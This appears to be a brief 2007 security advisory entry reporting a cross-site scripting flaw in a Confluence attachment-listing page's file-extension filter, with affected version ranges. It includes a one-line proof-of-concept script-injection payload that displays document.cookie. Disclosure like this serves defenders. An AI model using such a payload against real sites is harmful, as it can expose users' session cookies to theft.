XSS vulnerability in app/spaces/listattachmentforspace.action

2007-07-1912:41:10

b1e07ee35f09

jira.atlassian.com

Description:
XSS via the “Filter By File Extension” field in app/spaces/listattachmentforspace.action.

Exploit:
blah"><script>alert(document.cookie)</script><x x="

CPENameOperatorVersion
confluence server and data centerle2.5.4
confluence server and data centerlt2.5.6
confluence server and data centerlt2.6.0

Name	Operator	Version
confluence server and data center	le	2.5.4
confluence server and data center	lt	2.5.6
confluence server and data center	lt	2.6.0